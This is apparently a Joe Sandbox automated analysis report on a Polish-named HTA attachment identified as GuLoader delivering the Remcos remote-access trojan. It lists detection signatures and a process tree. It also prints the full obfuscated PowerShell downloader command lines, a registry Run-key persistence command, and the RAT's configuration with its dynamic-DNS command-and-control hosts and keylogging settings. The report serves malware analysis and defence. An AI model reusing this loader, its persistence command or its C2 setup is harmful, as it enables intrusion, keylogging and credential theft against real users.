Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta

Overview

General Information

Sample name:PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta
renamed because original name is a hash value
Original sample name:PLOCMR-002 Dane dotyczce dokumentw i towarw.hta
Analysis ID:1435041
MD5:86816f2832da46166cc3079c4c32a2d6
SHA1:a92657644d8dff7c7801eb465ca91e22767998b3
SHA256:655f862dff56546606f574d6ca39a4f7dc0d3f5fc22d3f2e3cd3562e7c78a63e
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 3716 cmdline: mshta.exe "C:\Users\user\Desktop\PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 3748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne (Bortledede ' Spe$ BasSTrsktQ,inaDatatSam iGennsVuggt ndsi,debkDalieColdr.hirspana.CracHuncueThroawa.edP.ogeUndirThe sSyns[Lder$ Conpundir TauoConslLictoPyrog.kraf,eamo BolrSpect GhuoAarelGreyk Kole nskrFdesest,a] nd=In,x$BirsRHaemhinane SaloNovap.pech P woSemirSanie Is ');$Jotas=Bortledede 'BrilS,evrtNonea Ho.tKyndiGodds R,ttSe,viguldk lawe ikar BeksCher.D.ntDUnyooTilbw No nE.lblEquaoUku.aCo.ndFladFUnsliCorrl Fore ryp(U,de$TranRExtee G,onRectpSuperFartiEgsjsEmbrePle,nAlka, .ra$Fl rN Rape BesvA.coiDelilPin,lProde Nons Sk ) imp ';$Jotas=$Frogmen[1]+$Jotas;$Nevilles=$Frogmen[0];Oraklerne (Bortledede 'M mm$Dameg .psl,lvso Ma bSpejaEndulfy.r: HjlGLejea KallKarri lord SejiG.imaVerd=Malp(SkudTBoate .issUintt Fri-Har,PClipasprit RavhUngr Disk$fejlN rheArbevHob.iL.tmlLys.lFo.teKon,s Van)Supe ');while (!$Galidia) {Oraklerne (Bortledede 'Fnat$Lenig SkalFrplo OphbIn.iaSuc l ur:DryeY.rowdGalirCo se Polr OpsnBl geNon,= nn$ScratEfter Endu,rleeDdss ') ;Oraklerne $Jotas;Oraklerne (Bortledede 'Un,vSAlchtR.meaP.nsrSlv.tW,tt-,uttSBeholInqueTe.meEskipFolk Kna.4 Non ');Oraklerne (Bortledede 'Forb$SamugrenolU.aboety.bHasma Fa,lma.r:tilhGPrj,aPolllso eiAfkrdMentiComaaitch=L,sk(AcraTSamoeSub sIsoctU,ad-Re,pPPse.aBengtNondhPagt Mast$ Ma,NTrane triv KlaiYurul Ratl v,leBiocsUnme)Esc. ') ;Oraklerne (Bortledede 'Bi t$KlimgStamlTempofngeb,ndeaDi clTaxa:H,reF D so ForrTu ksBagtiUdstk.frerskakiAjstn dengSub,sUnisuN ned MicgEngii,sylf.lagt ipe= .de$SoldgGyrol elvo TegbK.olaAntilColl:MunkJCabauOlied ,tnaSig iGowfs denmGaule .ff+gorg+I.ra% Ko,$RehnDOr.eiMetasBatcpFinaoTalmnGebeePol,n fo,tAcoee GlonPellhPhotePredd SeieGastn Apo.ImoecVerboSnoluT,kenForetColl ') ;$Renprisen=$Disponentenheden[$Forsikringsudgift];}Oraklerne (Bortledede ' Ho.$Bit.g CerlUdlaoOv rbRepea T,plPl t:S bnSDelfy NedvFlngaH,fta CobrBoarsPam.dHa lr Bree Cirn Speg oseCons skri=Bis. NickGCrype TvitReco-DitrC OveoUdginBagatPonde D.sn UnctEter Gen$Fo.uNspise Bugv D ciDobblSylll,ryge Eles mo, ');Oraklerne (Bortledede 'Beun$VaaggImp lNiu oO llbTrttabojal Smo:AnalD A.meLangcUnhooH mmmArrhpQ.anrO.spe libsOb asUniniPostvS aae Dek Un e=Havf Pelo[ arcSParky ddysselvtRet.eAflamFyrp.CompCmejso Vren SynvP,oteAarsrSnortFaxe]excu: rd:SkraFDolkr I,soHoflm ayeBAf.oa UdlsPseueS aa6Robo4OxydSMunitProsrBrakiSkuen ExcgBria(Band$UdlaSUnsyyMothv ph,a .isaMun.r Fols Svad ud r .ave ResnOutbgD iveA.da)Inge ');Oraklerne (Bortledede ' aci$Overg Aabl ibroCe,tbStj.a D,nlForl:SextSFanta,rimaIncomCouna .chsHammk,rskiOplanCh,leFllesPara Wood= Han Cu v[ .prSDemoy,rops FirtSp deUform K.m. KapT CaceSl,axNonitThe..Vas EAr enTermc .loo ,ondundeiRippnredegDoo,]Dise:Imbe:BeelAReseSBeskCT ocIUndiI Op.. gleGYasheHositPo,lSKundtModsrEpuli,lagnUnw.gSyn.( dr$ .asDHenhePlaucsengoAn um SubpTararAcc eFilmsThussNutmi Uidv.alle Se )Unso ');Oraklerne (Bortledede 'Skol$e fogCroolLorgoFli,bFlueaCu wlGrun:DimpE.anscHannoUn,onFireoEnstm TiliP,riz PhiaLongtTilli,anio,eadnOutl=Fore$barnSf eea kroa hopmRetaaPrecsSydvkChemi,mstn ueleT,lhsVeri.MechsBasiu SkibPlaysP,pitDiskrSi.aiConcnSa igDelo(Reco3,urv2Ting4 Cau8Hydr1Lame0Chem,Slb.2Sun 7,jae9Sukk2 Ove5Kl.g)Skel ');Oraklerne $Economization;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1892 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • powershell.exe (PID: 2212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne (Bortledede ' Spe$ BasSTrsktQ,inaDatatSam iGennsVuggt ndsi,debkDalieColdr.hirspana.CracHuncueThroawa.edP.ogeUndirThe sSyns[Lder$ Conpundir TauoConslLictoPyrog.kraf,eamo BolrSpect GhuoAarelGreyk Kole nskrFdesest,a] nd=In,x$BirsRHaemhinane SaloNovap.pech P woSemirSanie Is ');$Jotas=Bortledede 'BrilS,evrtNonea Ho.tKyndiGodds R,ttSe,viguldk lawe ikar BeksCher.D.ntDUnyooTilbw No nE.lblEquaoUku.aCo.ndFladFUnsliCorrl Fore ryp(U,de$TranRExtee G,onRectpSuperFartiEgsjsEmbrePle,nAlka, .ra$Fl rN Rape BesvA.coiDelilPin,lProde Nons Sk ) imp ';$Jotas=$Frogmen[1]+$Jotas;$Nevilles=$Frogmen[0];Oraklerne (Bortledede 'M mm$Dameg .psl,lvso Ma bSpejaEndulfy.r: HjlGLejea KallKarri lord SejiG.imaVerd=Malp(SkudTBoate .issUintt Fri-Har,PClipasprit RavhUngr Disk$fejlN rheArbevHob.iL.tmlLys.lFo.teKon,s Van)Supe ');while (!$Galidia) {Oraklerne (Bortledede 'Fnat$Lenig SkalFrplo OphbIn.iaSuc l ur:DryeY.rowdGalirCo se Polr OpsnBl geNon,= nn$ScratEfter Endu,rleeDdss ') ;Oraklerne $Jotas;Oraklerne (Bortledede 'Un,vSAlchtR.meaP.nsrSlv.tW,tt-,uttSBeholInqueTe.meEskipFolk Kna.4 Non ');Oraklerne (Bortledede 'Forb$SamugrenolU.aboety.bHasma Fa,lma.r:tilhGPrj,aPolllso eiAfkrdMentiComaaitch=L,sk(AcraTSamoeSub sIsoctU,ad-Re,pPPse.aBengtNondhPagt Mast$ Ma,NTrane triv KlaiYurul Ratl v,leBiocsUnme)Esc. ') ;Oraklerne (Bortledede 'Bi t$KlimgStamlTempofngeb,ndeaDi clTaxa:H,reF D so ForrTu ksBagtiUdstk.frerskakiAjstn dengSub,sUnisuN ned MicgEngii,sylf.lagt ipe= .de$SoldgGyrol elvo TegbK.olaAntilColl:MunkJCabauOlied ,tnaSig iGowfs denmGaule .ff+gorg+I.ra% Ko,$RehnDOr.eiMetasBatcpFinaoTalmnGebeePol,n fo,tAcoee GlonPellhPhotePredd SeieGastn Apo.ImoecVerboSnoluT,kenForetColl ') ;$Renprisen=$Disponentenheden[$Forsikringsudgift];}Oraklerne (Bortledede ' Ho.$Bit.g CerlUdlaoOv rbRepea T,plPl t:S bnSDelfy NedvFlngaH,fta CobrBoarsPam.dHa lr Bree Cirn Speg oseCons skri=Bis. NickGCrype TvitReco-DitrC OveoUdginBagatPonde D.sn UnctEter Gen$Fo.uNspise Bugv D ciDobblSylll,ryge Eles mo, ');Oraklerne (Bortledede 'Beun$VaaggImp lNiu oO llbTrttabojal Smo:AnalD A.meLangcUnhooH mmmArrhpQ.anrO.spe libsOb asUniniPostvS aae Dek Un e=Havf Pelo[ arcSParky ddysselvtRet.eAflamFyrp.CompCmejso Vren SynvP,oteAarsrSnortFaxe]excu: rd:SkraFDolkr I,soHoflm ayeBAf.oa UdlsPseueS aa6Robo4OxydSMunitProsrBrakiSkuen ExcgBria(Band$UdlaSUnsyyMothv ph,a .isaMun.r Fols Svad ud r .ave ResnOutbgD iveA.da)Inge ');Oraklerne (Bortledede ' aci$Overg Aabl ibroCe,tbStj.a D,nlForl:SextSFanta,rimaIncomCouna .chsHammk,rskiOplanCh,leFllesPara Wood= Han Cu v[ .prSDemoy,rops FirtSp deUform K.m. KapT CaceSl,axNonitThe..Vas EAr enTermc .loo ,ondundeiRippnredegDoo,]Dise:Imbe:BeelAReseSBeskCT ocIUndiI Op.. gleGYasheHositPo,lSKundtModsrEpuli,lagnUnw.gSyn.( dr$ .asDHenhePlaucsengoAn um SubpTararAcc eFilmsThussNutmi Uidv.alle Se )Unso ');Oraklerne (Bortledede 'Skol$e fogCroolLorgoFli,bFlueaCu wlGrun:DimpE.anscHannoUn,onFireoEnstm TiliP,riz PhiaLongtTilli,anio,eadnOutl=Fore$barnSf eea kroa hopmRetaaPrecsSydvkChemi,mstn ueleT,lhsVeri.MechsBasiu SkibPlaysP,pitDiskrSi.aiConcnSa igDelo(Reco3,urv2Ting4 Cau8Hydr1Lame0Chem,Slb.2Sun 7,jae9Sukk2 Ove5Kl.g)Skel ');Oraklerne $Economization;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2696 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 8024 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 7252 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 7492 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • wab.exe (PID: 4476 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7472 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7484 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 4164 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 3192 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7592 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7620 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • svchost.exe (PID: 1308 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrome.exe (PID: 1772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4952 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2420,i,2104451589269232737,4580126100320580491,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\mvourhjs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2590409597.0000000008570000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000000A.00000002.3229466080.0000000007337000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.2584352581.0000000005919000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000005.00000002.2590524362.0000000008E66000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 5 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi32_3748.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xe0e1:$b2: ::FromBase64String(
              • 0xb470:$s1: -join
              • 0x4c1c:$s4: +=
              • 0x4cde:$s4: +=
              • 0x8f05:$s4: +=
              • 0xb022:$s4: +=
              • 0xb30c:$s4: +=
              • 0xb452:$s4: +=
              • 0xd6a8:$s4: +=
              • 0xd728:$s4: +=
              • 0xd7ee:$s4: +=
              • 0xd86e:$s4: +=
              • 0xda44:$s4: +=
              • 0xdac8:$s4: +=
              • 0xbb91:$e4: Get-WmiObject
              • 0xbd80:$e4: Get-Process
              • 0xbdd8:$e4: Start-Process
              amsi32_2212.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xe043:$b2: ::FromBase64String(
              • 0xb470:$s1: -join
              • 0x4c1c:$s4: +=
              • 0x4cde:$s4: +=
              • 0x8f05:$s4: +=
              • 0xb022:$s4: +=
              • 0xb30c:$s4: +=
              • 0xb452:$s4: +=
              • 0xd6a8:$s4: +=
              • 0xd728:$s4: +=
              • 0xd7ee:$s4: +=
              • 0xd86e:$s4: +=
              • 0xda44:$s4: +=
              • 0xdac8:$s4: +=
              • 0xbb91:$e4: Get-WmiObject
              • 0xbd80:$e4: Get-Process
              • 0xbdd8:$e4: Start-Process
              • 0x156fc:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Suspicious MSHTA Child Process
